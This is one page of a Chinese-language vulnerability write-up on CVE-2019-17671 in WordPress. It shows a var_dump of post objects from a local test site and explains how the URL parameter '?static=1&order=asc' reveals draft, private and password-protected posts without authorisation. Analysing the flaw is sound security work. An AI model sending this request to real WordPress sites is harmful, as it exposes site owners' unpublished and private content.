CVE-2019-17671：如何查看WordPress未授权文章

        string(3) "raw"
      }
      [1]=>
      object(WP_Post)#764 (24) {
        ["ID"]=>
        int(41)
        ["post_author"]=>
        string(1) "1"
        ["post_date"]=>
        string(19) "2019-10-20 03:54:50"
        ["post_date_gmt"]=>
        string(19) "2019-10-20 03:54:50"
        ["post_content"]=>
        string(66) "
   
Public content
    "
        ["post_title"]=>
        string(13) "A public page"
        ["post_excerpt"]=>
        string(0) ""
        ["post_status"]=>
        string(7) "publish"
        ["comment_status"]=>
        string(6) "closed"
        ["ping_status"]=>
        string(6) "closed"
        ["post_password"]=>
        string(0) ""
        ["post_name"]=>
        string(13) "a-public-page"
        ["to_ping"]=>
        string(0) ""
        ["pinged"]=>
        string(0) ""
        ["post_modified"]=>
        string(19) "2019-10-20 03:55:10"
        ["post_modified_gmt"]=>
        string(19) "2019-10-20 03:55:10"
        ["post_content_filtered"]=>
        string(0) ""
        ["post_parent"]=>
        int(0)
        ["guid"]=>
        string(34) "http://wordpress.local/?page_id=41"
        ["menu_order"]=>
        int(0)
        ["post_type"]=>
        string(4) "page"
        ["post_mime_type"]=>
        string(0) ""
        ["comment_count"]=>
        string(1) "0"
        ["filter"]=>
        string(3) "raw"
      }
    }
大家可以看到，数组中的第一个页面为草稿(["post_status"]=>string(5) “draft”)，因此页面是没有内容的：

但是，我们可以使用其他的方法来控制返回的内容：
1、order with asc or desc
2、orderby
3、m with m=YYYY, m=YYYYMM or m=YYYYMMDD date format
4、…
在这种场景下，我们只需要颠倒返回元素的顺序即可实现漏洞利用。
接下来，访问http://wordpress.local/?static=1&order=asc，我们就可以查看到隐私内容了：

除此之外，我们还可以利用该漏洞查看password protected以及private状态的文章：

上一页  [1] [2] [3] [4] 

 4/5   首页 上一页 2 3 4 5 下一页 尾页